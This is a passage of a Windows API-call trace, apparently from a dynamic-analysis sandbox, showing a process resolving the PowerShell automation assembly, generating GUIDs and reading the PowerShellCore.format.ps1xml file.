	[0545.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.342] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x870533e0, Data2=0x65f0, Data3=0x4f44, Data4=([0]=0x94, [1]=0xcb, [2]=0x22, [3]=0x51, [4]=0xe9, [5]=0xbc, [6]=0x5, [7]=0x47))) returned 0x0
	[0545.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.347] VirtualQuery (in: lpAddress=0x1cb480, lpBuffer=0x1cc340, dwLength=0x30 | out: lpBuffer=0x1cc340*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0545.348] VirtualQuery (in: lpAddress=0x1cb510, lpBuffer=0x1cc3d0, dwLength=0x30 | out: lpBuffer=0x1cc3d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0545.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.349] VirtualQuery (in: lpAddress=0x1cbc90, lpBuffer=0x1ccb50, dwLength=0x30 | out: lpBuffer=0x1ccb50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0545.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.351] VirtualQuery (in: lpAddress=0x1cbc90, lpBuffer=0x1ccb50, dwLength=0x30 | out: lpBuffer=0x1ccb50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0545.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0545.353] VirtualQuery (in: lpAddress=0x1cbc90, lpBuffer=0x1ccb50, dwLength=0x30 | out: lpBuffer=0x1ccb50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0545.354] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x491496d6, Data2=0xde4a, Data3=0x4fb1, Data4=([0]=0xbe, [1]=0xc8, [2]=0x3f, [3]=0xc6, [4]=0x0, [5]=0x5b, [6]=0x75, [7]=0x33))) returned 0x0
	[0545.355] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x9f816431, Data2=0xa800, Data3=0x43fb, Data4=([0]=0x97, [1]=0x1, [2]=0xb5, [3]=0xff, [4]=0x5f, [5]=0x78, [6]=0xe6, [7]=0x39))) returned 0x0
	[0545.356] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x7504694d, Data2=0xff43, Data3=0x482f, Data4=([0]=0xb0, [1]=0xa5, [2]=0xe2, [3]=0x7b, [4]=0x89, [5]=0x44, [6]=0x69, [7]=0xe2))) returned 0x0
	[0545.367] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x2c996792, Data2=0x2a, Data3=0x4122, Data4=([0]=0x80, [1]=0x68, [2]=0x27, [3]=0x56, [4]=0x66, [5]=0xa4, [6]=0x64, [7]=0x4f))) returned 0x0
	[0545.368] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xe2b6b0dc, Data2=0x5c70, Data3=0x4728, Data4=([0]=0x96, [1]=0x54, [2]=0xb3, [3]=0x3c, [4]=0x51, [5]=0x3c, [6]=0xc, [7]=0x82))) returned 0x0
	[0545.368] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x5f558fca, Data2=0x5991, Data3=0x4ed7, Data4=([0]=0xaf, [1]=0x31, [2]=0xe6, [3]=0xee, [4]=0xf1, [5]=0xcf, [6]=0xed, [7]=0x92))) returned 0x0
	[0545.368] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xda64ae9a, Data2=0x9a8c, Data3=0x4e53, Data4=([0]=0x87, [1]=0xa3, [2]=0x53, [3]=0x39, [4]=0x49, [5]=0xff, [6]=0x3, [7]=0xcb))) returned 0x0
	[0545.369] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x294a28df, Data2=0x43c9, Data3=0x45e1, Data4=([0]=0xa4, [1]=0xde, [2]=0xc, [3]=0xff, [4]=0xed, [5]=0xa3, [6]=0xca, [7]=0x73))) returned 0x0
	[0545.369] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x2b0af43e, Data2=0xfab2, Data3=0x40ff, Data4=([0]=0xbc, [1]=0xdf, [2]=0xb2, [3]=0x87, [4]=0x22, [5]=0xda, [6]=0x1d, [7]=0x1d))) returned 0x0
	[0545.369] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x200998df, Data2=0xab92, Data3=0x4c48, Data4=([0]=0xb2, [1]=0xcc, [2]=0x8a, [3]=0x98, [4]=0xd5, [5]=0x48, [6]=0x7e, [7]=0xcb))) returned 0x0
	[0545.369] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x4399b612, Data2=0x9b8d, Data3=0x4bd9, Data4=([0]=0xb9, [1]=0x13, [2]=0xc9, [3]=0xb8, [4]=0x14, [5]=0x3, [6]=0x1e, [7]=0x38))) returned 0x0
	[0545.369] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xf5832ebf, Data2=0xfef2, Data3=0x4c78, Data4=([0]=0x9f, [1]=0x86, [2]=0xbb, [3]=0x17, [4]=0x8c, [5]=0xeb, [6]=0x18, [7]=0xff))) returned 0x0
	[0546.318] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x8d4db339, Data2=0x28d5, Data3=0x4448, Data4=([0]=0xb3, [1]=0x4d, [2]=0x18, [3]=0xa0, [4]=0xd, [5]=0xab, [6]=0x6a, [7]=0x1a))) returned 0x0
	[0546.319] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x7079a2e2, Data2=0x1c08, Data3=0x439a, Data4=([0]=0x85, [1]=0x4f, [2]=0x4a, [3]=0xb9, [4]=0x2f, [5]=0x14, [6]=0xde, [7]=0x91))) returned 0x0
	[0546.320] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x2f1ecb5f, Data2=0x1091, Data3=0x4aa6, Data4=([0]=0x80, [1]=0x6, [2]=0x32, [3]=0x8a, [4]=0x1b, [5]=0xde, [6]=0xdc, [7]=0x1a))) returned 0x0
	[0546.320] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x131bd029, Data2=0x3fb6, Data3=0x42b0, Data4=([0]=0xb1, [1]=0xa8, [2]=0x84, [3]=0xfc, [4]=0x95, [5]=0x62, [6]=0xa5, [7]=0x4b))) returned 0x0
	[0546.320] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xbbf68851, Data2=0x97dd, Data3=0x4195, Data4=([0]=0x8e, [1]=0xc6, [2]=0xe0, [3]=0xf1, [4]=0xf5, [5]=0xcc, [6]=0x9f, [7]=0xf6))) returned 0x0
	[0546.320] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x5599546e, Data2=0x30d1, Data3=0x4e45, Data4=([0]=0xba, [1]=0x5a, [2]=0x2a, [3]=0x1c, [4]=0xe3, [5]=0x99, [6]=0x71, [7]=0x35))) returned 0x0
	[0546.320] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x6c556192, Data2=0xa040, Data3=0x4179, Data4=([0]=0xbf, [1]=0xee, [2]=0xaf, [3]=0x2c, [4]=0xda, [5]=0x84, [6]=0x81, [7]=0x92))) returned 0x0
	[0546.321] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x68f4d88f, Data2=0x3378, Data3=0x40da, Data4=([0]=0x86, [1]=0x1d, [2]=0x7d, [3]=0x4f, [4]=0xc5, [5]=0x96, [6]=0x1d, [7]=0xac))) returned 0x0
	[0546.321] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x1bb4efd6, Data2=0x1d1d, Data3=0x465e, Data4=([0]=0xa3, [1]=0xce, [2]=0x2e, [3]=0x1d, [4]=0xba, [5]=0x3a, [6]=0xb, [7]=0x1))) returned 0x0
	[0546.321] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x6668cbbc, Data2=0x850, Data3=0x4339, Data4=([0]=0xb2, [1]=0xb9, [2]=0x50, [3]=0xce, [4]=0x1e, [5]=0xd6, [6]=0xe4, [7]=0x18))) returned 0x0
	[0546.321] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0546.321] GetFileType (hFile=0x324) returned 0x1
	[0546.321] SetErrorMode (uMode=0x1) returned 0x1
	[0546.322] GetFileType (hFile=0x324) returned 0x1
	[0546.322] ReadFile (in: hFile=0x324, lpBuffer=0x2ebcba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2ebcba8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.323] ReadFile (in: hFile=0x324, lpBuffer=0x2ebcba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2ebcba8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.323] ReadFile (in: hFile=0x324, lpBuffer=0x2ebcba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2ebcba8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.323] ReadFile (in: hFile=0x324, lpBuffer=0x2ebcba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2ebcba8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.323] ReadFile (in: hFile=0x324, lpBuffer=0x2ebcba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2ebcba8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.323] ReadFile (in: hFile=0x324, lpBuffer=0x2ebcba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2ebcba8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.324] ReadFile (in: hFile=0x324, lpBuffer=0x2ebcba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2ebcba8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.324] ReadFile (in: hFile=0x324, lpBuffer=0x2ebcba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2ebcba8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.324] ReadFile (in: hFile=0x324, lpBuffer=0x2ebcba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2ebcba8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.326] ReadFile (in: hFile=0x324, lpBuffer=0x2ebcba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2ebcba8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.326] ReadFile (in: hFile=0x324, lpBuffer=0x2ebcba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2ebcba8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.326] ReadFile (in: hFile=0x324, lpBuffer=0x2ebcba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2ebcba8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.326] ReadFile (in: hFile=0x324, lpBuffer=0x2ebcba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2ebcba8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.327] ReadFile (in: hFile=0x324, lpBuffer=0x2ebcba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2ebcba8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.327] ReadFile (in: hFile=0x324, lpBuffer=0x2ebcba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2ebcba8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.327] ReadFile (in: hFile=0x324, lpBuffer=0x2ebcba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2ebcba8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.328] ReadFile (in: hFile=0x324, lpBuffer=0x2ebcba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2ebcba8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.337] ReadFile (in: hFile=0x324, lpBuffer=0x2ebcba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2ebcba8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.338] ReadFile (in: hFile=0x324, lpBuffer=0x2ebcba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2ebcba8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.338] ReadFile (in: hFile=0x324, lpBuffer=0x2ebcba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2ebcba8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.338] ReadFile (in: hFile=0x324, lpBuffer=0x2ebcba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2ebcba8*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
